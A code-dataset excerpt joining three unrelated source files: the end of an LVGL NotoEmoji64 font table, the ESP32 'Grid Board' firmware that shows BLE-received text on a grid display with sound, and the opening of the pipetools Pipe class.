{.bitmap_index = 72084, .adv_w = 1300, .box_w = 77, .box_h = 62, .ofs_x = 2, .ofs_y = -9},
{.bitmap_index = 72681, .adv_w = 1300, .box_w = 76, .box_h = 62, .ofs_x = 3, .ofs_y = -9},
{.bitmap_index = 73270, .adv_w = 1300, .box_w = 69, .box_h = 62, .ofs_x = 6, .ofs_y = -9},
{.bitmap_index = 73805, .adv_w = 1300, .box_w = 53, .box_h = 64, .ofs_x = 14, .ofs_y = -10},
{.bitmap_index = 74229, .adv_w = 1300, .box_w = 72, .box_h = 65, .ofs_x = 5, .ofs_y = -11},
{.bitmap_index = 74814, .adv_w = 1300, .box_w = 70, .box_h = 52, .ofs_x = 6, .ofs_y = -4},
{.bitmap_index = 75269, .adv_w = 1300, .box_w = 74, .box_h = 55, .ofs_x = 4, .ofs_y = -6},
{.bitmap_index = 75778, .adv_w = 1300, .box_w = 63, .box_h = 64, .ofs_x = 9, .ofs_y = -10},
{.bitmap_index = 76282, .adv_w = 1300, .box_w = 63, .box_h = 63, .ofs_x = 9, .ofs_y = -10},
{.bitmap_index = 76779, .adv_w = 1300, .box_w = 76, .box_h = 58, .ofs_x = 3, .ofs_y = -7},
{.bitmap_index = 77330, .adv_w = 1300, .box_w = 69, .box_h = 64, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 77882, .adv_w = 1300, .box_w = 74, .box_h = 56, .ofs_x = 4, .ofs_y = -6},
{.bitmap_index = 78400, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 78929, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 79449, .adv_w = 1300, .box_w = 49, .box_h = 65, .ofs_x = 16, .ofs_y = -11},
{.bitmap_index = 79848, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 80368, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 80897, .adv_w = 1300, .box_w = 69, .box_h = 65, .ofs_x = 6, .ofs_y = -11},
{.bitmap_index = 81458, .adv_w = 1300, .box_w = 63, .box_h = 65, .ofs_x = 9, .ofs_y = -11},
{.bitmap_index = 81970, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 82499, .adv_w = 1300, .box_w = 73, .box_h = 50, .ofs_x = 4, .ofs_y = -3},
{.bitmap_index = 82956, .adv_w = 1300, .box_w = 71, .box_h = 65, .ofs_x = 5, .ofs_y = -11},
{.bitmap_index = 83533, .adv_w = 1300, .box_w = 66, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 84070, .adv_w = 1300, .box_w = 59, .box_h = 65, .ofs_x = 11, .ofs_y = -11},
{.bitmap_index = 84550, .adv_w = 1300, .box_w = 76, .box_h = 58, .ofs_x = 3, .ofs_y = -7},
{.bitmap_index = 85101, .adv_w = 1300, .box_w = 77, .box_h = 65, .ofs_x = 2, .ofs_y = -11},
{.bitmap_index = 85727, .adv_w = 1300, .box_w = 76, .box_h = 65, .ofs_x = 2, .ofs_y = -11},
{.bitmap_index = 86345, .adv_w = 1300, .box_w = 76, .box_h = 59, .ofs_x = 2, .ofs_y = -8},
{.bitmap_index = 86906, .adv_w = 1300, .box_w = 70, .box_h = 66, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 87484, .adv_w = 1300, .box_w = 76, .box_h = 52, .ofs_x = 2, .ofs_y = -4},
{.bitmap_index = 87978, .adv_w = 1300, .box_w = 64, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 88490, .adv_w = 1300, .box_w = 72, .box_h = 46, .ofs_x = 5, .ofs_y = -1},
{.bitmap_index = 88904, .adv_w = 1300, .box_w = 75, .box_h = 61, .ofs_x = 3, .ofs_y = -9},
{.bitmap_index = 89476, .adv_w = 1300, .box_w = 75, .box_h = 49, .ofs_x = 3, .ofs_y = -3},
{.bitmap_index = 89936, .adv_w = 1300, .box_w = 75, .box_h = 62, .ofs_x = 3, .ofs_y = -9},
{.bitmap_index = 90518, .adv_w = 1300, .box_w = 72, .box_h = 55, .ofs_x = 5, .ofs_y = -6},
{.bitmap_index = 91013, .adv_w = 1300, .box_w = 77, .box_h = 62, .ofs_x = 2, .ofs_y = -9},
{.bitmap_index = 91610, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 92130, .adv_w = 1300, .box_w = 66, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 92667, .adv_w = 1300, .box_w = 67, .box_h = 65, .ofs_x = 7, .ofs_y = -11},
{.bitmap_index = 93212, .adv_w = 1300, .box_w = 65, .box_h = 66, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 93749, .adv_w = 1300, .box_w = 64, .box_h = 65, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 94269, .adv_w = 1300, .box_w = 71, .box_h = 65, .ofs_x = 5, .ofs_y = -11},
{.bitmap_index = 94846, .adv_w = 1300, .box_w = 72, .box_h = 58, .ofs_x = 4, .ofs_y = -7},
{.bitmap_index = 95368, .adv_w = 1300, .box_w = 77, .box_h = 36, .ofs_x = 2, .ofs_y = 4},
{.bitmap_index = 95715, .adv_w = 1300, .box_w = 78, .box_h = 36, .ofs_x = 2, .ofs_y = 4},
{.bitmap_index = 96066, .adv_w = 1300, .box_w = 31, .box_h = 64, .ofs_x = 25, .ofs_y = -10},
{.bitmap_index = 96314, .adv_w = 1300, .box_w = 67, .box_h = 64, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 96850, .adv_w = 1300, .box_w = 61, .box_h = 64, .ofs_x = 10, .ofs_y = -10},
{.bitmap_index = 97338, .adv_w = 1300, .box_w = 64, .box_h = 66, .ofs_x = 9, .ofs_y = -11},
{.bitmap_index = 97866, .adv_w = 1300, .box_w = 37, .box_h = 64, .ofs_x = 22, .ofs_y = -10},
{.bitmap_index = 98162, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 98682, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 99211, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 99731, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 100251, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 100771, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 101291, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 101811, .adv_w = 1300, .box_w = 73, .box_h = 49, .ofs_x = 5, .ofs_y = -3},
{.bitmap_index = 102259, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 102779, .adv_w = 1300, .box_w = 60, .box_h = 64, .ofs_x = 10, .ofs_y = -10},
{.bitmap_index = 103259, .adv_w = 1300, .box_w = 72, .box_h = 65, .ofs_x = 5, .ofs_y = -11},
{.bitmap_index = 103844, .adv_w = 1300, .box_w = 36, .box_h = 64, .ofs_x = 23, .ofs_y = -10},
{.bitmap_index = 104132, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 104652, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 105172, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 105701, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 106230, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 106759, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 107288, .adv_w = 1300, .box_w = 48, .box_h = 64, .ofs_x = 16, .ofs_y = -10},
{.bitmap_index = 107672, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 108201, .adv_w = 1300, .box_w = 67, .box_h = 64, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 108737, .adv_w = 1300, .box_w = 65, .box_h = 58, .ofs_x = 8, .ofs_y = -7},
{.bitmap_index = 109209, .adv_w = 1300, .box_w = 66, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 109746, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 110275, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 110804, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 111333, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 111862, .adv_w = 1300, .box_w = 69, .box_h = 64, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 112414, .adv_w = 1300, .box_w = 72, .box_h = 49, .ofs_x = 5, .ofs_y = -3},
{.bitmap_index = 112855, .adv_w = 1300, .box_w = 62, .box_h = 65, .ofs_x = 9, .ofs_y = -11},
{.bitmap_index = 113359, .adv_w = 1300, .box_w = 68, .box_h = 62, .ofs_x = 7, .ofs_y = -9},
{.bitmap_index = 113886, .adv_w = 1300, .box_w = 72, .box_h = 49, .ofs_x = 5, .ofs_y = -3},
{.bitmap_index = 114327, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 114856, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 115385, .adv_w = 1300, .box_w = 61, .box_h = 65, .ofs_x = 10, .ofs_y = -11},
{.bitmap_index = 115881, .adv_w = 1300, .box_w = 51, .box_h = 64, .ofs_x = 15, .ofs_y = -10},
{.bitmap_index = 116289, .adv_w = 1300, .box_w = 70, .box_h = 64, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 116849, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 117369, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 117898, .adv_w = 1300, .box_w = 59, .box_h = 65, .ofs_x = 12, .ofs_y = -11},
{.bitmap_index = 118378, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 118898, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 119418, .adv_w = 1300, .box_w = 71, .box_h = 64, .ofs_x = 5, .ofs_y = -10},
{.bitmap_index = 119986, .adv_w = 1300, .box_w = 55, .box_h = 64, .ofs_x = 13, .ofs_y = -10},
{.bitmap_index = 120426, .adv_w = 1300, .box_w = 45, .box_h = 64, .ofs_x = 18, .ofs_y = -10},
{.bitmap_index = 120786, .adv_w = 1300, .box_w = 66, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 121323, .adv_w = 1300, .box_w = 66, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 121860, .adv_w = 1300, .box_w = 76, .box_h = 47, .ofs_x = 3, .ofs_y = -2},
{.bitmap_index = 122307, .adv_w = 1300, .box_w = 75, .box_h = 64, .ofs_x = 4, .ofs_y = -10},
{.bitmap_index = 122907, .adv_w = 1300, .box_w = 75, .box_h = 64, .ofs_x = 3, .ofs_y = -10},
{.bitmap_index = 123507, .adv_w = 1300, .box_w = 68, .box_h = 65, .ofs_x = 7, .ofs_y = -11},
{.bitmap_index = 124060, .adv_w = 1300, .box_w = 67, .box_h = 46, .ofs_x = 7, .ofs_y = -1},
{.bitmap_index = 124446, .adv_w = 1300, .box_w = 66, .box_h = 65, .ofs_x = 7, .ofs_y = -11},
{.bitmap_index = 124983, .adv_w = 1300, .box_w = 63, .box_h = 64, .ofs_x = 9, .ofs_y = -10},
{.bitmap_index = 125487, .adv_w = 1300, .box_w = 69, .box_h = 65, .ofs_x = 6, .ofs_y = -11},
{.bitmap_index = 126048, .adv_w = 1300, .box_w = 76, .box_h = 58, .ofs_x = 3, .ofs_y = -7},
{.bitmap_index = 126599, .adv_w = 1300, .box_w = 76, .box_h = 56, .ofs_x = 3, .ofs_y = -6},
{.bitmap_index = 127131, .adv_w = 1300, .box_w = 64, .box_h = 46, .ofs_x = 9, .ofs_y = -1},
{.bitmap_index = 127499, .adv_w = 1300, .box_w = 76, .box_h = 52, .ofs_x = 3, .ofs_y = -4},
{.bitmap_index = 127993, .adv_w = 1300, .box_w = 75, .box_h = 66, .ofs_x = 4, .ofs_y = -11},
{.bitmap_index = 128612, .adv_w = 1300, .box_w = 78, .box_h = 52, .ofs_x = 2, .ofs_y = -4},
{.bitmap_index = 129119, .adv_w = 1300, .box_w = 69, .box_h = 65, .ofs_x = 6, .ofs_y = -11}
};
/*---------------------
* CHARACTER MAPPING
*--------------------*/
static const uint16_t unicode_list_0[] = {
0x0, 0xf, 0x11, 0x47, 0x5f, 0xd70a
};
static const uint8_t glyph_id_ofs_list_5[] = {
0, 1, 2, 3, 4, 5, 6, 7,
0, 0, 8, 9, 10, 0, 0, 0,
0, 11, 12, 13, 14, 15, 16, 17,
18, 19, 20, 0, 0, 0, 21, 0,
22, 23, 0, 0, 0, 24, 0, 0,
25, 26, 27, 28, 29, 30, 31, 32,
33, 34
};
/*Collect the unicode lists and glyph_id offsets*/
static const lv_font_fmt_txt_cmap_t cmaps[] =
{
{
.range_start = 9989, .range_length = 55051, .glyph_id_start = 1,
.unicode_list = unicode_list_0, .glyph_id_ofs_list = NULL, .list_length = 6, .type = LV_FONT_FMT_TXT_CMAP_SPARSE_TINY
},
{
.range_start = 128192, .range_length = 62, .glyph_id_start = 7,
.unicode_list = NULL, .glyph_id_ofs_list = NULL, .list_length = 0, .type = LV_FONT_FMT_TXT_CMAP_FORMAT0_TINY
},
{
.range_start = 128255, .range_length = 1, .glyph_id_start = 69,
.unicode_list = NULL, .glyph_id_ofs_list = NULL, .list_length = 0, .type = LV_FONT_FMT_TXT_CMAP_FORMAT0_TINY
},
{
.range_start = 128512, .range_length = 80, .glyph_id_start = 70,
.unicode_list = NULL, .glyph_id_ofs_list = NULL, .list_length = 0, .type = LV_FONT_FMT_TXT_CMAP_FORMAT0_TINY
},
{
.range_start = 128640, .range_length = 70, .glyph_id_start = 150,
.unicode_list = NULL, .glyph_id_ofs_list = NULL, .list_length = 0, .type = LV_FONT_FMT_TXT_CMAP_FORMAT0_TINY
},
{
.range_start = 128715, .range_length = 50, .glyph_id_start = 220,
.unicode_list = NULL, .glyph_id_ofs_list = glyph_id_ofs_list_5, .list_length = 50, .type = LV_FONT_FMT_TXT_CMAP_FORMAT0_FULL
}
};
/*--------------------
* ALL CUSTOM DATA
*--------------------*/
#if LVGL_VERSION_MAJOR == 8
/*Store all the custom data of the font*/
static lv_font_fmt_txt_glyph_cache_t cache;
#endif
#if LVGL_VERSION_MAJOR >= 8
static const lv_font_fmt_txt_dsc_t font_dsc = {
#else
static lv_font_fmt_txt_dsc_t font_dsc = {
#endif
.glyph_bitmap = glyph_bitmap,
.glyph_dsc = glyph_dsc,
.cmaps = cmaps,
.kern_dsc = NULL,
.kern_scale = 0,
.cmap_num = 6,
.bpp = 1,
.kern_classes = 0,
.bitmap_format = 0,
#if LVGL_VERSION_MAJOR == 8
.cache = &cache
#endif
};
/*-----------------
* PUBLIC FONT
*----------------*/
/*Initialize a public general font descriptor*/
#if LVGL_VERSION_MAJOR >= 8
const lv_font_t NotoEmoji64 = {
#else
lv_font_t NotoEmoji64 = {
#endif
.get_glyph_dsc = lv_font_get_glyph_dsc_fmt_txt, /*Function pointer to get glyph's data*/
.get_glyph_bitmap = lv_font_get_bitmap_fmt_txt, /*Function pointer to get glyph's bitmap*/
.line_height = 68, /*The maximum line height required by the font*/
.base_line = 12, /*Baseline measured from the bottom of the line*/
#if !(LVGL_VERSION_MAJOR == 6 && LVGL_VERSION_MINOR == 0)
.subpx = LV_FONT_SUBPX_NONE,
#endif
#if LV_VERSION_CHECK(7, 4, 0) || LVGL_VERSION_MAJOR >= 8
.underline_position = 39,
.underline_thickness = 4,
#endif
//.static_bitmap = 0,
.dsc = &font_dsc, /*The custom font data. Will be accessed by `get_glyph_bitmap/dsc` */
#if LV_VERSION_CHECK(8, 2, 0) || LVGL_VERSION_MAJOR >= 9
.fallback = NULL,
#endif
.user_data = NULL,
};
#endif /*#if NOTOEMOJI64*/
| 807,474 | NotoEmoji64 | c | en | c | code | {"qsc_code_num_words": 135657, "qsc_code_num_chars": 807474.0, "qsc_code_mean_word_length": 3.42367884, "qsc_code_frac_words_unique": 0.00852886, "qsc_code_frac_chars_top_2grams": 0.43241195, "qsc_code_frac_chars_top_3grams": 0.40974624, "qsc_code_frac_chars_top_4grams": 0.32459317, "qsc_code_frac_chars_dupe_5grams": 0.84453952, "qsc_code_frac_chars_dupe_6grams": 0.75301973, "qsc_code_frac_chars_dupe_7grams": 0.65470905, "qsc_code_frac_chars_dupe_8grams": 0.54306852, "qsc_code_frac_chars_dupe_9grams": 0.48294097, "qsc_code_frac_chars_dupe_10grams": 0.46029248, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.4159104, "qsc_code_frac_chars_whitespace": 0.25218149, "qsc_code_size_file_byte": 807474.0, "qsc_code_num_lines": 17204.0, "qsc_code_num_chars_line_max": 207.0, "qsc_code_num_chars_line_mean": 46.93524762, "qsc_code_frac_chars_alphabet": 0.35281795, "qsc_code_frac_chars_comments": 0.00681508, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.29373949, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 2.868e-05, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.55892046, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.00018025, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.00030041, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": 0.0019827} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 1, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 1, "qsc_code_frac_chars_dupe_6grams": 1, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 1, "qsc_code_frac_chars_digital": 1, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 1, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0015/Grid_Board | main/main.cpp | /**
* @file main.cpp
* @brief Main firmware entry point for the Grid Board project.
*
* Grid Board is an interactive 12x5 grid display system built with ESP32-P4 Nano with 10.1-inch display (Waveshare)
* and LVGL, featuring animated characters, emoji support, and Bluetooth Low Energy (BLE)
* communication with a Flutter-based mobile controller.
*
* This project is designed for creative message display,
* and mobile-to-device communication over BLE.
*
* Author: Eric Nam
* YouTube: https://youtube.com/@thatproject
* Repository: https://github.com/0015/Grid_Board
*/
#include "esp_log.h"
#include "esp_err.h"
#include "esp_check.h"
#include "esp_memory_utils.h"
#include "esp_random.h"
#include "esp_timer.h"
#include "nvs_flash.h"
#include "ble_server.h"
#include "esp_heap_caps.h"
#include "bsp/esp-bsp.h"
#include "bsp_board_extra.h"
#include "bsp/display.h"
#include "lvgl.h"
#include "driver/gpio.h"
#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "freertos/semphr.h"
#include <stdio.h>
#include <string.h>
#include <string>
#include <vector>
#include <algorithm>
#include <random>
#include "grid_board.hpp"
extern const uint8_t card_pcm_start[] asm("_binary_card_pcm_start");
extern const uint8_t card_pcm_end[] asm("_binary_card_pcm_end");
// Global grid board instance
static GridBoard grid_board;
static const char *device_name = "Grid_Board";
static std::string target_text = " WELCOME😀 TO 📌GRID BOARD❤ ";
static QueueHandle_t sfx_queue = nullptr;
void card_flip_sfx_task(void *param)
{
static int64_t last_sfx_time = 0;
const int MIN_SFX_INTERVAL_MS = 33;
size_t pcm_size = card_pcm_end - card_pcm_start;
size_t bytes_written = 0;
bool active = true;
while (1)
{
uint8_t msg;
if (xQueueReceive(sfx_queue, &msg, portMAX_DELAY) == pdTRUE)
{
if (msg == 0)
{
// "Pause" - just go idle until new non-zero request arrives
active = false;
continue;
}
// Only play if in active mode
int64_t now = esp_timer_get_time() / 1000; // ms
if (now - last_sfx_time >= MIN_SFX_INTERVAL_MS)
{
last_sfx_time = now;
bsp_extra_i2s_write((void *)card_pcm_start, pcm_size, &bytes_written, 200);
}
active = true;
}
}
}
void start_sfx_task()
{
if (!sfx_queue)
sfx_queue = xQueueCreate(8, sizeof(uint8_t));
xTaskCreate(card_flip_sfx_task, "card_flip_sfx_task", 4096, nullptr, 3, nullptr);
}
void start_card_flip_sound_task()
{
if (sfx_queue)
{
uint8_t msg = 1;
xQueueSend(sfx_queue, &msg, 0);
}
}
void stop_card_flip_sound_task()
{
if (sfx_queue)
{
// Flush any queued SFX requests
uint8_t dummy;
while (xQueueReceive(sfx_queue, &dummy, 0) == pdTRUE)
;
uint8_t exit_msg = 0;
xQueueSend(sfx_queue, &exit_msg, 0);
}
}
// Main UI initialization function
void ui_gridboard_animation_start(lv_obj_t *parent)
{
// Set up the sound callback
grid_board.set_sound_callback(start_card_flip_sound_task, stop_card_flip_sound_task);
// Initialize the grid board
grid_board.initialize(parent);
if (target_text.empty())
{
ESP_LOGI(device_name, "Target text is empty, skipping animation.");
return;
}
lv_timer_create([](lv_timer_t *t)
{
lv_timer_del(t);
// Process and animate the welcome text
grid_board.process_text_and_animate(target_text); }, 5000, NULL);
}
// Audio system initialization
void app_audio_init()
{
ESP_ERROR_CHECK(bsp_extra_codec_init());
ESP_ERROR_CHECK(bsp_extra_player_init());
// Set volume and unmute
bsp_extra_codec_volume_set(80, NULL);
bsp_extra_codec_mute_set(false);
// Enable power amplifier
gpio_set_direction(BSP_POWER_AMP_IO, GPIO_MODE_OUTPUT);
gpio_set_level(BSP_POWER_AMP_IO, 1);
ESP_LOGI("AUDIO", "Audio system initialized");
}
// BLE callback functions
static void on_connect(bool connected)
{
ESP_LOGI(device_name, "BLE %s", connected ? "Connected" : "Disconnected");
}
static void on_data_received(const uint8_t *data, uint16_t len)
{
// Convert received data to string
std::string received_text;
received_text.reserve(len + 1);
for (int i = 0; i < len; i++)
{
received_text += (char)data[i];
}
ESP_LOGI(device_name, "Received text: '%s' (length: %d)", received_text.c_str(), len);
// Update the target text and animate
target_text = received_text;
// Wait for any current animations to finish before starting new ones
while (grid_board.is_animation_running())
{
vTaskDelay(pdMS_TO_TICKS(100));
}
bsp_display_lock(0);
// Process and animate the new text
grid_board.process_text_and_animate(target_text);
bsp_display_unlock();
}
extern "C" void app_main(void)
{
esp_err_t ret = nvs_flash_init();
if (ret == ESP_ERR_NVS_NO_FREE_PAGES || ret == ESP_ERR_NVS_NEW_VERSION_FOUND)
{
ESP_ERROR_CHECK(nvs_flash_erase());
ret = nvs_flash_init();
}
ESP_ERROR_CHECK(ret);
ble_server_register_callbacks(on_connect, on_data_received);
ble_server_start(device_name);
// Initialize audio system
app_audio_init();
start_sfx_task();
bsp_display_cfg_t cfg = {
.lvgl_port_cfg = ESP_LVGL_PORT_INIT_CONFIG(),
//.buffer_size = BSP_LCD_DRAW_BUFF_SIZE,
.buffer_size = 800 * 10, // 10 lines buffer (16kB at RGB565)
.double_buffer = BSP_LCD_DRAW_BUFF_DOUBLE,
.flags = {
.buff_dma = true,
.buff_spiram = false,
.sw_rotate = true,
}};
bsp_display_start_with_config(&cfg);
bsp_display_backlight_on();
lv_disp_t *disp = lv_disp_get_default();
bsp_display_rotate(disp, LV_DISP_ROTATION_90);
bsp_display_lock(0);
ui_gridboard_animation_start(lv_screen_active());
bsp_display_unlock();
}
| 6,120 | main | cpp | en | cpp | code | {"qsc_code_num_words": 842, "qsc_code_num_chars": 6120.0, "qsc_code_mean_word_length": 4.47743468, "qsc_code_frac_words_unique": 0.33491686, "qsc_code_frac_chars_top_2grams": 0.0403183, "qsc_code_frac_chars_top_3grams": 0.01750663, "qsc_code_frac_chars_top_4grams": 0.01803714, "qsc_code_frac_chars_dupe_5grams": 0.09814324, "qsc_code_frac_chars_dupe_6grams": 0.06366048, "qsc_code_frac_chars_dupe_7grams": 0.03766578, "qsc_code_frac_chars_dupe_8grams": 0.02334218, "qsc_code_frac_chars_dupe_9grams": 0.02334218, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01704667, "qsc_code_frac_chars_whitespace": 0.23316993, "qsc_code_size_file_byte": 6120.0, "qsc_code_num_lines": 224.0, "qsc_code_num_chars_line_max": 117.0, "qsc_code_num_chars_line_mean": 27.32142857, "qsc_code_frac_chars_alphabet": 0.78563818, "qsc_code_frac_chars_comments": 0.20735294, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.03846154, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.10204082, "qsc_code_frac_chars_long_word_length": 0.00453515, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codecpp_frac_lines_preprocessor_directives": 0.15384615, "qsc_codecpp_frac_lines_func_ratio": 0.05769231, "qsc_codecpp_cate_bitsstdc": 0.0, "qsc_codecpp_nums_lines_main": 0.0, "qsc_codecpp_frac_lines_goto": 0.0, "qsc_codecpp_cate_var_zero": 0.0, "qsc_codecpp_score_lines_no_logic": 0.22435897, "qsc_codecpp_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codecpp_frac_lines_func_ratio": 0, "qsc_codecpp_nums_lines_main": 0, "qsc_codecpp_score_lines_no_logic": 0, "qsc_codecpp_frac_lines_preprocessor_directives": 0, "qsc_codecpp_frac_lines_print": 0} |
0101/pipetools | pipetools/main.py | try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
from functools import partial, wraps, WRAPPER_ASSIGNMENTS
from pipetools.debug import get_name, set_name, repr_args
from pipetools.compat import text_type, string_types, dict_items
class Pipe(object):
"""
Pipe-style combinator.
Example::
p = pipe | F | G | H
p(x) == H(G(F(x)))
"""
def __init__(self, func=None):
self.func = func
self.__name__ = 'Pipe'
def __str__(self):
return get_name(self.func)
